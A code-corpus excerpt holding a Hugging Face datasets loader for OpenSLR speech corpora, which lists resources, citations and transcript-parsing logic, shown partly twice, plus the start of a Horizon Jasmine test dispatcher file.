"DataDirs": ["asr_sundanese/data"] * 16,
},
"SLR41": {
"Language": "Javanese",
"LongName": "High quality TTS data for Javanese",
"Category": "Speech",
"Summary": "Multi-speaker TTS data for Javanese (jv-ID)",
"Files": ["jv_id_female.zip", "jv_id_male.zip"],
"IndexFiles": ["jv_id_female/line_index.tsv", "jv_id_male/line_index.tsv"],
"DataDirs": ["jv_id_female/wavs", "jv_id_male/wavs"],
},
"SLR42": {
"Language": "Khmer",
"LongName": "High quality TTS data for Khmer",
"Category": "Speech",
"Summary": "Multi-speaker TTS data for Khmer (km-KH)",
"Files": ["km_kh_male.zip"],
"IndexFiles": ["km_kh_male/line_index.tsv"],
"DataDirs": ["km_kh_male/wavs"],
},
"SLR43": {
"Language": "Nepali",
"LongName": "High quality TTS data for Nepali",
"Category": "Speech",
"Summary": "Multi-speaker TTS data for Nepali (ne-NP)",
"Files": ["ne_np_female.zip"],
"IndexFiles": ["ne_np_female/line_index.tsv"],
"DataDirs": ["ne_np_female/wavs"],
},
"SLR44": {
"Language": "Sundanese",
"LongName": "High quality TTS data for Sundanese",
"Category": "Speech",
"Summary": "Multi-speaker TTS data for Javanese Sundanese (su-ID)",
"Files": ["su_id_female.zip", "su_id_male.zip"],
"IndexFiles": ["su_id_female/line_index.tsv", "su_id_male/line_index.tsv"],
"DataDirs": ["su_id_female/wavs", "su_id_male/wavs"],
},
"SLR63": {
"Language": "Malayalam",
"LongName": "Crowdsourced high-quality Malayalam multi-speaker speech data set",
"Category": "Speech",
"Summary": "Data set which contains recordings of native speakers of Malayalam",
"Files": ["ml_in_female.zip", "ml_in_male.zip"],
"IndexFiles": ["line_index.tsv", "line_index.tsv"],
"DataDirs": ["", ""],
},
"SLR64": {
"Language": "Marathi",
"LongName": "Crowdsourced high-quality Marathi multi-speaker speech data set",
"Category": "Speech",
"Summary": "Data set which contains recordings of native speakers of Marathi",
"Files": ["mr_in_female.zip"],
"IndexFiles": ["line_index.tsv"],
"DataDirs": ["", ""],
},
"SLR65": {
"Language": "Tamil",
"LongName": "Crowdsourced high-quality Tamil multi-speaker speech data set",
"Category": "Speech",
"Summary": "Data set which contains recordings of native speakers of Tamil",
"Files": ["ta_in_female.zip", "ta_in_male.zip"],
"IndexFiles": ["line_index.tsv", "line_index.tsv"],
"DataDirs": ["", ""],
},
"SLR66": {
"Language": "Telugu",
"LongName": "Crowdsourced high-quality Telugu multi-speaker speech data set",
"Category": "Speech",
"Summary": "Data set which contains recordings of native speakers of Telugu",
"Files": ["te_in_female.zip", "te_in_male.zip"],
"IndexFiles": ["line_index.tsv", "line_index.tsv"],
"DataDirs": ["", ""],
},
"SLR69": {
"Language": "Catalan",
"LongName": "Crowdsourced high-quality Catalan speech data set",
"Category": "Speech",
"Summary": "Data set which contains recordings of Catalan",
"Files": ["ca_es_female.zip", "ca_es_male.zip"],
"IndexFiles": ["line_index.tsv", "line_index.tsv"],
"DataDirs": ["", ""],
},
"SLR70": {
"Language": "Nigerian English",
"LongName": "Crowdsourced high-quality Nigerian English speech data set",
"Category": "Speech",
"Summary": "Data set which contains recordings of Nigerian English",
"Files": ["en_ng_female.zip", "en_ng_male.zip"],
"IndexFiles": ["line_index.tsv", "line_index.tsv"],
"DataDirs": ["", ""],
},
"SLR71": {
"Language": "Chilean Spanish",
"LongName": "Crowdsourced high-quality Chilean Spanish speech data set",
"Category": "Speech",
"Summary": "Data set which contains recordings of Chilean Spanish",
"Files": ["es_cl_female.zip", "es_cl_male.zip"],
"IndexFiles": ["line_index.tsv", "line_index.tsv"],
"DataDirs": ["", ""],
},
"SLR72": {
"Language": "Columbian Spanish",
"LongName": "Crowdsourced high-quality Columbian Spanish speech data set",
"Category": "Speech",
"Summary": "Data set which contains recordings of Columbian Spanish",
"Files": ["es_co_female.zip", "es_co_male.zip"],
"IndexFiles": ["line_index.tsv", "line_index.tsv"],
"DataDirs": ["", ""],
},
"SLR73": {
"Language": "Peruvian Spanish",
"LongName": "Crowdsourced high-quality Peruvian Spanish speech data set",
"Category": "Speech",
"Summary": "Data set which contains recordings of Peruvian Spanish",
"Files": ["es_pe_female.zip", "es_pe_male.zip"],
"IndexFiles": ["line_index.tsv", "line_index.tsv"],
"DataDirs": ["", ""],
},
"SLR74": {
"Language": "Puerto Rico Spanish",
"LongName": "Crowdsourced high-quality Puerto Rico Spanish speech data set",
"Category": "Speech",
"Summary": "Data set which contains recordings of Puerto Rico Spanish",
"Files": ["es_pr_female.zip"],
"IndexFiles": ["line_index.tsv"],
"DataDirs": [""],
},
"SLR75": {
"Language": "Venezuelan Spanish",
"LongName": "Crowdsourced high-quality Venezuelan Spanish speech data set",
"Category": "Speech",
"Summary": "Data set which contains recordings of Venezuelan Spanish",
"Files": ["es_ve_female.zip", "es_ve_male.zip"],
"IndexFiles": ["line_index.tsv", "line_index.tsv"],
"DataDirs": ["", ""],
},
"SLR76": {
"Language": "Basque",
"LongName": "Crowdsourced high-quality Basque speech data set",
"Category": "Speech",
"Summary": "Data set which contains recordings of Basque",
"Files": ["eu_es_female.zip", "eu_es_male.zip"],
"IndexFiles": ["line_index.tsv", "line_index.tsv"],
"DataDirs": ["", ""],
},
"SLR77": {
"Language": "Galician",
"LongName": "Crowdsourced high-quality Galician speech data set",
"Category": "Speech",
"Summary": "Data set which contains recordings of Galician",
"Files": ["gl_es_female.zip", "gl_es_male.zip"],
"IndexFiles": ["line_index.tsv", "line_index.tsv"],
"DataDirs": ["", ""],
},
"SLR78": {
"Language": "Gujarati",
"LongName": "Crowdsourced high-quality Gujarati multi-speaker speech data set",
"Category": "Speech",
"Summary": "Data set which contains recordings of native speakers of Gujarati",
"Files": ["gu_in_female.zip", "gu_in_male.zip"],
"IndexFiles": ["line_index.tsv", "line_index.tsv"],
"DataDirs": ["", ""],
},
"SLR79": {
"Language": "Kannada",
"LongName": "Crowdsourced high-quality Kannada multi-speaker speech data set",
"Category": "Speech",
"Summary": "Data set which contains recordings of native speakers of Kannada",
"Files": ["kn_in_female.zip", "kn_in_male.zip"],
"IndexFiles": ["line_index.tsv", "line_index.tsv"],
"DataDirs": ["", ""],
},
"SLR80": {
"Language": "Burmese",
"LongName": "Crowdsourced high-quality Burmese speech data set",
"Category": "Speech",
"Summary": "Data set which contains recordings of Burmese",
"Files": ["my_mm_female.zip"],
"IndexFiles": ["line_index.tsv"],
"DataDirs": [""],
},
"SLR86": {
"Language": "Yoruba",
"LongName": "Crowdsourced high-quality Yoruba speech data set",
"Category": "Speech",
"Summary": "Data set which contains recordings of Yoruba",
"Files": ["yo_ng_female.zip", "yo_ng_male.zip"],
"IndexFiles": ["line_index.tsv", "line_index.tsv"],
"DataDirs": ["", ""],
},
}
class OpenSlrConfig(datasets.BuilderConfig):
    """BuilderConfig for OpenSlr."""

    def __init__(self, name, **kwargs):
        """
        Args:
            name: `string`, the OpenSLR resource id (e.g. "SLR35"), used as
                the config name.
            **kwargs: keyword arguments forwarded to super. The following
                keys (all sourced from _RESOURCES) are consumed here:
                language, long_name, category, summary, files, index_files,
                data_dirs.
        """
        self.language = kwargs.pop("language", None)
        self.long_name = kwargs.pop("long_name", None)
        self.category = kwargs.pop("category", None)
        self.summary = kwargs.pop("summary", None)
        self.files = kwargs.pop("files", None)
        self.index_files = kwargs.pop("index_files", None)
        self.data_dirs = kwargs.pop("data_dirs", None)
        # BUG FIX: use the `name` parameter directly. `self.name` is only
        # assigned by super().__init__(), so reading it here would pick up
        # BuilderConfig's class-level default instead of this config's name.
        description = f"Open Speech and Language Resources dataset in {self.language}. Name: {name}, Summary: {self.summary}."
        super(OpenSlrConfig, self).__init__(name=name, description=description, **kwargs)
class OpenSlr(datasets.GeneratorBasedBuilder):
    """Loader for the OpenSLR speech corpora described in _RESOURCES.

    Every config exposes a single "train" split whose examples are
    (audio file path, transcript sentence) pairs.
    """

    BUILDER_CONFIGS = [
        OpenSlrConfig(
            name=resource_id,
            language=_RESOURCES[resource_id]["Language"],
            long_name=_RESOURCES[resource_id]["LongName"],
            category=_RESOURCES[resource_id]["Category"],
            summary=_RESOURCES[resource_id]["Summary"],
            files=_RESOURCES[resource_id]["Files"],
            index_files=_RESOURCES[resource_id]["IndexFiles"],
            data_dirs=_RESOURCES[resource_id]["DataDirs"],
        )
        for resource_id in _RESOURCES.keys()
    ]

    def _info(self):
        """Return dataset metadata: each example is a path plus a sentence."""
        features = datasets.Features(
            {
                "path": datasets.Value("string"),
                "sentence": datasets.Value("string"),
            }
        )
        return datasets.DatasetInfo(
            description=_DESCRIPTION,
            features=features,
            supervised_keys=None,
            homepage=_HOMEPAGE,
            license=_LICENSE,
            citation=_CITATION,
        )

    def _split_generators(self, dl_manager):
        """Download every archive of this resource and expose one train split."""
        # Archives for resource "SLRnn" live at https://openslr.org/resources/nn/.
        resource_number = self.config.name.replace("SLR", "")
        urls = [f"{_DATA_URL.format(resource_number)}/{file}" for file in self.config.files]
        dl_paths = dl_manager.download_and_extract(urls)
        # index_files/data_dirs are parallel to files; join each against its
        # own extracted archive root.
        abs_path_to_indexs = [os.path.join(path, self.config.index_files[i]) for i, path in enumerate(dl_paths)]
        abs_path_to_datas = [os.path.join(path, self.config.data_dirs[i]) for i, path in enumerate(dl_paths)]
        return [
            datasets.SplitGenerator(
                name=datasets.Split.TRAIN,
                gen_kwargs={
                    "path_to_indexs": abs_path_to_indexs,
                    "path_to_datas": abs_path_to_datas,
                },
            ),
        ]

    def _generate_examples(self, path_to_indexs, path_to_datas):
        """ Yields examples. """
        counter = -1
        if self.config.name in ["SLR35", "SLR36"]:
            # These ASR corpora ship a (filename, speaker, sentence) index and
            # store audio as .flac files in nested directories, so we build a
            # filename -> sentence map and then walk the audio tree.
            sentence_index = {}
            for i, path_to_index in enumerate(path_to_indexs):
                with open(path_to_index, encoding="utf-8") as f:
                    lines = f.readlines()
                for line in lines:
                    # Fields are separated by one or (inconsistently) two tabs.
                    field_values = re.split(r"\t\t?", line.strip())
                    filename, user_id, sentence = field_values
                    sentence_index[filename] = sentence
                for path_to_data in sorted(Path(path_to_datas[i]).rglob("*.flac")):
                    filename = path_to_data.stem
                    if path_to_data.stem not in sentence_index:
                        # Audio file without a transcript entry: skip it.
                        continue
                    path = str(path_to_data.resolve())
                    sentence = sentence_index[filename]
                    counter += 1
                    yield counter, {"path": path, "sentence": sentence}
        else:
            for i, path_to_index in enumerate(path_to_indexs):
                with open(path_to_index, encoding="utf-8") as f:
                    lines = f.readlines()
                for line in lines:
                    # Following regexs are needed to normalise the lines, since the datasets
                    # are not always consistent and have bugs:
                    line = re.sub(r"\t[^\t]*\t", "\t", line.strip())
                    field_values = re.split(r"\t\t?", line)
                    if len(field_values) != 2:
                        continue
                    filename, sentence = field_values
                    # BUG FIX: build the audio path from the filename parsed out
                    # of the index line. The previous literal f"(unknown).wav"
                    # had no placeholder and pointed every example at the same
                    # non-existent file.
                    path = os.path.join(path_to_datas[i], f"{filename}.wav")
                    counter += 1
                    yield counter, {"path": path, "sentence": sentence}
| 42.569388 | 234 | 0.608706 |
from __future__ import absolute_import, division, print_function
import os
import re
from pathlib import Path
import datasets
_DATA_URL = "https://openslr.org/resources/{}"
_CITATION = """\
SLR35, SLR36:
@inproceedings{kjartansson-etal-sltu2018,
title = {{Crowd-Sourced Speech Corpora for Javanese, Sundanese, Sinhala, Nepali, and Bangladeshi Bengali}},
author = {Oddur Kjartansson and Supheakmungkol Sarin and Knot Pipatsrisawat and Martin Jansche and Linne Ha},
booktitle = {Proc. The 6th Intl. Workshop on Spoken Language Technologies for Under-Resourced Languages (SLTU)},
year = {2018},
address = {Gurugram, India},
month = aug,
pages = {52--55},
URL = {http://dx.doi.org/10.21437/SLTU.2018-11},
}
SLR41, SLR42, SLR43, SLR44:
@inproceedings{kjartansson-etal-tts-sltu2018,
title = {{A Step-by-Step Process for Building TTS Voices Using Open Source Data and Framework for Bangla, Javanese, Khmer, Nepali, Sinhala, and Sundanese}},
author = {Keshan Sodimana and Knot Pipatsrisawat and Linne Ha and Martin Jansche and Oddur Kjartansson and Pasindu De Silva and Supheakmungkol Sarin},
booktitle = {Proc. The 6th Intl. Workshop on Spoken Language Technologies for Under-Resourced Languages (SLTU)},
year = {2018},
address = {Gurugram, India},
month = aug,
pages = {66--70},
URL = {http://dx.doi.org/10.21437/SLTU.2018-14}
}
SLR63, SLR64, SLR65, SLR66, SLR78, SLR79:
@inproceedings{he-etal-2020-open,
title = {{Open-source Multi-speaker Speech Corpora for Building Gujarati, Kannada, Malayalam, Marathi, Tamil and Telugu Speech Synthesis Systems}},
author = {He, Fei and Chu, Shan-Hui Cathy and Kjartansson, Oddur and Rivera, Clara and Katanova, Anna and Gutkin, Alexander and Demirsahin, Isin and Johny, Cibu and Jansche, Martin and Sarin, Supheakmungkol and Pipatsrisawat, Knot},
booktitle = {Proceedings of The 12th Language Resources and Evaluation Conference (LREC)},
month = may,
year = {2020},
address = {Marseille, France},
publisher = {European Language Resources Association (ELRA)},
pages = {6494--6503},
url = {https://www.aclweb.org/anthology/2020.lrec-1.800},
ISBN = "{979-10-95546-34-4},
}
SLR69, SLR76, SLR77:
@inproceedings{kjartansson-etal-2020-open,
title = {{Open-Source High Quality Speech Datasets for Basque, Catalan and Galician}},
author = {Kjartansson, Oddur and Gutkin, Alexander and Butryna, Alena and Demirsahin, Isin and Rivera, Clara},
booktitle = {Proceedings of the 1st Joint Workshop on Spoken Language Technologies for Under-resourced languages (SLTU) and Collaboration and Computing for Under-Resourced Languages (CCURL)},
year = {2020},
pages = {21--27},
month = may,
address = {Marseille, France},
publisher = {European Language Resources association (ELRA)},
url = {https://www.aclweb.org/anthology/2020.sltu-1.3},
ISBN = {979-10-95546-35-1},
}
SLR71, SLR71, SLR72, SLR73, SLR74, SLR75:
@inproceedings{guevara-rukoz-etal-2020-crowdsourcing,
title = {{Crowdsourcing Latin American Spanish for Low-Resource Text-to-Speech}},
author = {Guevara-Rukoz, Adriana and Demirsahin, Isin and He, Fei and Chu, Shan-Hui Cathy and Sarin, Supheakmungkol and Pipatsrisawat, Knot and Gutkin, Alexander and Butryna, Alena and Kjartansson, Oddur},
booktitle = {Proceedings of The 12th Language Resources and Evaluation Conference (LREC)},
year = {2020},
month = may,
address = {Marseille, France},
publisher = {European Language Resources Association (ELRA)},
url = {https://www.aclweb.org/anthology/2020.lrec-1.801},
pages = {6504--6513},
ISBN = {979-10-95546-34-4},
}
SLR80
@inproceedings{oo-etal-2020-burmese,
title = {{Burmese Speech Corpus, Finite-State Text Normalization and Pronunciation Grammars with an Application to Text-to-Speech}},
author = {Oo, Yin May and Wattanavekin, Theeraphol and Li, Chenfang and De Silva, Pasindu and Sarin, Supheakmungkol and Pipatsrisawat, Knot and Jansche, Martin and Kjartansson, Oddur and Gutkin, Alexander},
booktitle = {Proceedings of The 12th Language Resources and Evaluation Conference (LREC)},
month = may,
year = {2020},
pages = "6328--6339",
address = {Marseille, France},
publisher = {European Language Resources Association (ELRA)},
url = {https://www.aclweb.org/anthology/2020.lrec-1.777},
ISBN = {979-10-95546-34-4},
}
SLR86
@inproceedings{gutkin-et-al-yoruba2020,
title = {{Developing an Open-Source Corpus of Yoruba Speech}},
author = {Alexander Gutkin and Işın Demirşahin and Oddur Kjartansson and Clara Rivera and Kọ́lá Túbọ̀sún},
booktitle = {Proceedings of Interspeech 2020},
pages = {404--408},
month = {October},
year = {2020},
address = {Shanghai, China},
publisher = {International Speech and Communication Association (ISCA)},
doi = {10.21437/Interspeech.2020-1096},
url = {https://dx.doi.org/10.21437/Interspeech.2020-1096},
}
"""
_DESCRIPTION = """\
OpenSLR is a site devoted to hosting speech and language resources, such as training corpora for speech recognition,
and software related to speech recognition. We intend to be a convenient place for anyone to put resources that
they have created, so that they can be downloaded publicly.
"""
_HOMEPAGE = "https://openslr.org/"
_LICENSE = ""
_RESOURCES = {
"SLR35": {
"Language": "Javanese",
"LongName": "Large Javanese ASR training data set",
"Category": "Speech",
"Summary": "Javanese ASR training data set containing ~185K utterances",
"Files": [
"asr_javanese_0.zip",
"asr_javanese_1.zip",
"asr_javanese_2.zip",
"asr_javanese_3.zip",
"asr_javanese_4.zip",
"asr_javanese_5.zip",
"asr_javanese_6.zip",
"asr_javanese_7.zip",
"asr_javanese_8.zip",
"asr_javanese_9.zip",
"asr_javanese_a.zip",
"asr_javanese_b.zip",
"asr_javanese_c.zip",
"asr_javanese_d.zip",
"asr_javanese_e.zip",
"asr_javanese_f.zip",
],
"IndexFiles": ["asr_javanese/utt_spk_text.tsv"] * 16,
"DataDirs": ["asr_javanese/data"] * 16,
},
"SLR36": {
"Language": "Sundanese",
"LongName": "Large Sundanese ASR training data set",
"Category": "Speech",
"Summary": "Sundanese ASR training data set containing ~220K utterances",
"Files": [
"asr_sundanese_0.zip",
"asr_sundanese_1.zip",
"asr_sundanese_2.zip",
"asr_sundanese_3.zip",
"asr_sundanese_4.zip",
"asr_sundanese_5.zip",
"asr_sundanese_6.zip",
"asr_sundanese_7.zip",
"asr_sundanese_8.zip",
"asr_sundanese_9.zip",
"asr_sundanese_a.zip",
"asr_sundanese_b.zip",
"asr_sundanese_c.zip",
"asr_sundanese_d.zip",
"asr_sundanese_e.zip",
"asr_sundanese_f.zip",
],
"IndexFiles": ["asr_sundanese/utt_spk_text.tsv"] * 16,
"DataDirs": ["asr_sundanese/data"] * 16,
},
"SLR41": {
"Language": "Javanese",
"LongName": "High quality TTS data for Javanese",
"Category": "Speech",
"Summary": "Multi-speaker TTS data for Javanese (jv-ID)",
"Files": ["jv_id_female.zip", "jv_id_male.zip"],
"IndexFiles": ["jv_id_female/line_index.tsv", "jv_id_male/line_index.tsv"],
"DataDirs": ["jv_id_female/wavs", "jv_id_male/wavs"],
},
"SLR42": {
"Language": "Khmer",
"LongName": "High quality TTS data for Khmer",
"Category": "Speech",
"Summary": "Multi-speaker TTS data for Khmer (km-KH)",
"Files": ["km_kh_male.zip"],
"IndexFiles": ["km_kh_male/line_index.tsv"],
"DataDirs": ["km_kh_male/wavs"],
},
"SLR43": {
"Language": "Nepali",
"LongName": "High quality TTS data for Nepali",
"Category": "Speech",
"Summary": "Multi-speaker TTS data for Nepali (ne-NP)",
"Files": ["ne_np_female.zip"],
"IndexFiles": ["ne_np_female/line_index.tsv"],
"DataDirs": ["ne_np_female/wavs"],
},
"SLR44": {
"Language": "Sundanese",
"LongName": "High quality TTS data for Sundanese",
"Category": "Speech",
"Summary": "Multi-speaker TTS data for Javanese Sundanese (su-ID)",
"Files": ["su_id_female.zip", "su_id_male.zip"],
"IndexFiles": ["su_id_female/line_index.tsv", "su_id_male/line_index.tsv"],
"DataDirs": ["su_id_female/wavs", "su_id_male/wavs"],
},
"SLR63": {
"Language": "Malayalam",
"LongName": "Crowdsourced high-quality Malayalam multi-speaker speech data set",
"Category": "Speech",
"Summary": "Data set which contains recordings of native speakers of Malayalam",
"Files": ["ml_in_female.zip", "ml_in_male.zip"],
"IndexFiles": ["line_index.tsv", "line_index.tsv"],
"DataDirs": ["", ""],
},
"SLR64": {
"Language": "Marathi",
"LongName": "Crowdsourced high-quality Marathi multi-speaker speech data set",
"Category": "Speech",
"Summary": "Data set which contains recordings of native speakers of Marathi",
"Files": ["mr_in_female.zip"],
"IndexFiles": ["line_index.tsv"],
"DataDirs": ["", ""],
},
"SLR65": {
"Language": "Tamil",
"LongName": "Crowdsourced high-quality Tamil multi-speaker speech data set",
"Category": "Speech",
"Summary": "Data set which contains recordings of native speakers of Tamil",
"Files": ["ta_in_female.zip", "ta_in_male.zip"],
"IndexFiles": ["line_index.tsv", "line_index.tsv"],
"DataDirs": ["", ""],
},
"SLR66": {
"Language": "Telugu",
"LongName": "Crowdsourced high-quality Telugu multi-speaker speech data set",
"Category": "Speech",
"Summary": "Data set which contains recordings of native speakers of Telugu",
"Files": ["te_in_female.zip", "te_in_male.zip"],
"IndexFiles": ["line_index.tsv", "line_index.tsv"],
"DataDirs": ["", ""],
},
"SLR69": {
"Language": "Catalan",
"LongName": "Crowdsourced high-quality Catalan speech data set",
"Category": "Speech",
"Summary": "Data set which contains recordings of Catalan",
"Files": ["ca_es_female.zip", "ca_es_male.zip"],
"IndexFiles": ["line_index.tsv", "line_index.tsv"],
"DataDirs": ["", ""],
},
"SLR70": {
"Language": "Nigerian English",
"LongName": "Crowdsourced high-quality Nigerian English speech data set",
"Category": "Speech",
"Summary": "Data set which contains recordings of Nigerian English",
"Files": ["en_ng_female.zip", "en_ng_male.zip"],
"IndexFiles": ["line_index.tsv", "line_index.tsv"],
"DataDirs": ["", ""],
},
"SLR71": {
"Language": "Chilean Spanish",
"LongName": "Crowdsourced high-quality Chilean Spanish speech data set",
"Category": "Speech",
"Summary": "Data set which contains recordings of Chilean Spanish",
"Files": ["es_cl_female.zip", "es_cl_male.zip"],
"IndexFiles": ["line_index.tsv", "line_index.tsv"],
"DataDirs": ["", ""],
},
"SLR72": {
"Language": "Columbian Spanish",
"LongName": "Crowdsourced high-quality Columbian Spanish speech data set",
"Category": "Speech",
"Summary": "Data set which contains recordings of Columbian Spanish",
"Files": ["es_co_female.zip", "es_co_male.zip"],
"IndexFiles": ["line_index.tsv", "line_index.tsv"],
"DataDirs": ["", ""],
},
"SLR73": {
"Language": "Peruvian Spanish",
"LongName": "Crowdsourced high-quality Peruvian Spanish speech data set",
"Category": "Speech",
"Summary": "Data set which contains recordings of Peruvian Spanish",
"Files": ["es_pe_female.zip", "es_pe_male.zip"],
"IndexFiles": ["line_index.tsv", "line_index.tsv"],
"DataDirs": ["", ""],
},
"SLR74": {
"Language": "Puerto Rico Spanish",
"LongName": "Crowdsourced high-quality Puerto Rico Spanish speech data set",
"Category": "Speech",
"Summary": "Data set which contains recordings of Puerto Rico Spanish",
"Files": ["es_pr_female.zip"],
"IndexFiles": ["line_index.tsv"],
"DataDirs": [""],
},
"SLR75": {
"Language": "Venezuelan Spanish",
"LongName": "Crowdsourced high-quality Venezuelan Spanish speech data set",
"Category": "Speech",
"Summary": "Data set which contains recordings of Venezuelan Spanish",
"Files": ["es_ve_female.zip", "es_ve_male.zip"],
"IndexFiles": ["line_index.tsv", "line_index.tsv"],
"DataDirs": ["", ""],
},
"SLR76": {
"Language": "Basque",
"LongName": "Crowdsourced high-quality Basque speech data set",
"Category": "Speech",
"Summary": "Data set which contains recordings of Basque",
"Files": ["eu_es_female.zip", "eu_es_male.zip"],
"IndexFiles": ["line_index.tsv", "line_index.tsv"],
"DataDirs": ["", ""],
},
"SLR77": {
"Language": "Galician",
"LongName": "Crowdsourced high-quality Galician speech data set",
"Category": "Speech",
"Summary": "Data set which contains recordings of Galician",
"Files": ["gl_es_female.zip", "gl_es_male.zip"],
"IndexFiles": ["line_index.tsv", "line_index.tsv"],
"DataDirs": ["", ""],
},
"SLR78": {
"Language": "Gujarati",
"LongName": "Crowdsourced high-quality Gujarati multi-speaker speech data set",
"Category": "Speech",
"Summary": "Data set which contains recordings of native speakers of Gujarati",
"Files": ["gu_in_female.zip", "gu_in_male.zip"],
"IndexFiles": ["line_index.tsv", "line_index.tsv"],
"DataDirs": ["", ""],
},
"SLR79": {
"Language": "Kannada",
"LongName": "Crowdsourced high-quality Kannada multi-speaker speech data set",
"Category": "Speech",
"Summary": "Data set which contains recordings of native speakers of Kannada",
"Files": ["kn_in_female.zip", "kn_in_male.zip"],
"IndexFiles": ["line_index.tsv", "line_index.tsv"],
"DataDirs": ["", ""],
},
"SLR80": {
"Language": "Burmese",
"LongName": "Crowdsourced high-quality Burmese speech data set",
"Category": "Speech",
"Summary": "Data set which contains recordings of Burmese",
"Files": ["my_mm_female.zip"],
"IndexFiles": ["line_index.tsv"],
"DataDirs": [""],
},
"SLR86": {
"Language": "Yoruba",
"LongName": "Crowdsourced high-quality Yoruba speech data set",
"Category": "Speech",
"Summary": "Data set which contains recordings of Yoruba",
"Files": ["yo_ng_female.zip", "yo_ng_male.zip"],
"IndexFiles": ["line_index.tsv", "line_index.tsv"],
"DataDirs": ["", ""],
},
}
class OpenSlrConfig(datasets.BuilderConfig):
    """BuilderConfig for one OpenSLR resource (e.g. "SLR41").

    The keyword arguments mirror the fields of the ``_RESOURCES`` table:
    ``language``, ``long_name``, ``category``, ``summary``, ``files``,
    ``index_files`` and ``data_dirs``.
    """

    def __init__(self, name, **kwargs):
        self.language = kwargs.pop("language", None)
        self.long_name = kwargs.pop("long_name", None)
        self.category = kwargs.pop("category", None)
        self.summary = kwargs.pop("summary", None)
        self.files = kwargs.pop("files", None)
        self.index_files = kwargs.pop("index_files", None)
        self.data_dirs = kwargs.pop("data_dirs", None)
        # Bug fix: use the `name` argument directly. `self.name` is only
        # assigned by the base-class __init__, which has not run yet here,
        # so the description previously showed the base class's default
        # name (or failed) instead of the resource id.
        description = f"Open Speech and Language Resources dataset in {self.language}. Name: {name}, Summary: {self.summary}."
        super(OpenSlrConfig, self).__init__(name=name, description=description, **kwargs)
class OpenSlr(datasets.GeneratorBasedBuilder):
    """Dataset builder for the OpenSLR speech corpora listed in ``_RESOURCES``."""

    # One config per OpenSLR resource id, populated from the _RESOURCES table.
    BUILDER_CONFIGS = [
        OpenSlrConfig(
            name=resource_id,
            language=_RESOURCES[resource_id]["Language"],
            long_name=_RESOURCES[resource_id]["LongName"],
            category=_RESOURCES[resource_id]["Category"],
            summary=_RESOURCES[resource_id]["Summary"],
            files=_RESOURCES[resource_id]["Files"],
            index_files=_RESOURCES[resource_id]["IndexFiles"],
            data_dirs=_RESOURCES[resource_id]["DataDirs"],
        )
        for resource_id in _RESOURCES.keys()
    ]

    def _info(self):
        """Return dataset metadata: each example is an audio path plus its transcript."""
        features = datasets.Features(
            {
                "path": datasets.Value("string"),
                "sentence": datasets.Value("string"),
            }
        )
        return datasets.DatasetInfo(
            description=_DESCRIPTION,
            features=features,
            supervised_keys=None,
            homepage=_HOMEPAGE,
            license=_LICENSE,
            citation=_CITATION,
        )

    def _split_generators(self, dl_manager):
        """Download and extract every archive of the resource; expose one TRAIN split."""
        # "SLR41" -> "41", used to build the download URL.
        resource_number = self.config.name.replace("SLR", "")
        urls = [f"{_DATA_URL.format(resource_number)}/{file}" for file in self.config.files]
        dl_paths = dl_manager.download_and_extract(urls)
        # Each archive ships its own transcript index file and audio directory.
        abs_path_to_indexs = [os.path.join(path, f"{self.config.index_files[i]}") for i, path in enumerate(dl_paths)]
        abs_path_to_datas = [os.path.join(path, f"{self.config.data_dirs[i]}") for i, path in enumerate(dl_paths)]
        return [
            datasets.SplitGenerator(
                name=datasets.Split.TRAIN,
                gen_kwargs={
                    "path_to_indexs": abs_path_to_indexs,
                    "path_to_datas": abs_path_to_datas,
                },
            ),
        ]

    def _generate_examples(self, path_to_indexs, path_to_datas):
        """Yield (key, {"path", "sentence"}) examples parsed from the index files."""
        counter = -1
        if self.config.name in ["SLR35", "SLR36"]:
            # Large Javanese/Sundanese ASR sets: index rows are
            # <filename>\t<speaker_id>\t<sentence> and audio is stored as
            # .flac files in nested data directories.
            sentence_index = {}
            for i, path_to_index in enumerate(path_to_indexs):
                with open(path_to_index, encoding="utf-8") as f:
                    lines = f.readlines()
                for id_, line in enumerate(lines):
                    # Some rows use a double tab as the field separator.
                    field_values = re.split(r"\t\t?", line.strip())
                    filename, user_id, sentence = field_values
                    sentence_index[filename] = sentence
                for path_to_data in sorted(Path(path_to_datas[i]).rglob("*.flac")):
                    filename = path_to_data.stem
                    if path_to_data.stem not in sentence_index:
                        continue
                    path = str(path_to_data.resolve())
                    sentence = sentence_index[filename]
                    counter += 1
                    yield counter, {"path": path, "sentence": sentence}
        else:
            for i, path_to_index in enumerate(path_to_indexs):
                with open(path_to_index, encoding="utf-8") as f:
                    lines = f.readlines()
                for id_, line in enumerate(lines):
                    # Following regexs are needed to normalise the lines, since the datasets
                    # are not always consistent and have bugs:
                    line = re.sub(r"\t[^\t]*\t", "\t", line.strip())
                    field_values = re.split(r"\t\t?", line)
                    if len(field_values) != 2:
                        continue
                    filename, sentence = field_values
                    # Bug fix: build the absolute audio path from the parsed
                    # filename. The previous literal "(unknown).wav" ignored
                    # `filename` and produced the same bogus path for every row.
                    path = os.path.join(path_to_datas[i], f"{filename}.wav")
                    counter += 1
                    yield counter, {"path": path, "sentence": sentence}
| true | true |
f72304d340d02f0fda30bcdf157dff94ff2f8baa | 1,752 | py | Python | openstack_dashboard/test/jasmine/jasmine.py | timpricecatalyst/horizon | 8279ae0ed464e62e1c91e78341342160f8a07172 | [
"Apache-2.0"
] | 930 | 2015-01-04T08:06:03.000Z | 2022-03-13T18:47:13.000Z | openstack_dashboard/test/jasmine/jasmine.py | timpricecatalyst/horizon | 8279ae0ed464e62e1c91e78341342160f8a07172 | [
"Apache-2.0"
] | 106 | 2019-01-18T03:06:55.000Z | 2019-11-29T05:06:18.000Z | openstack_dashboard/test/jasmine/jasmine.py | timpricecatalyst/horizon | 8279ae0ed464e62e1c91e78341342160f8a07172 | [
"Apache-2.0"
] | 1,040 | 2015-01-01T18:48:28.000Z | 2022-03-19T08:35:18.000Z | #
# (c) Copyright 2015 Hewlett-Packard Development Company, L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import inspect
import sys
import django.shortcuts
import django.views.defaults
def dispatcher(request, test_name):
    """Render the Jasmine index page, or the spec-runner page for one test class."""
    # import is included in this non-standard location to avoid
    # problems importing mox. See bug/1288245
    from openstack_dashboard.test.jasmine import jasmine_tests as tests

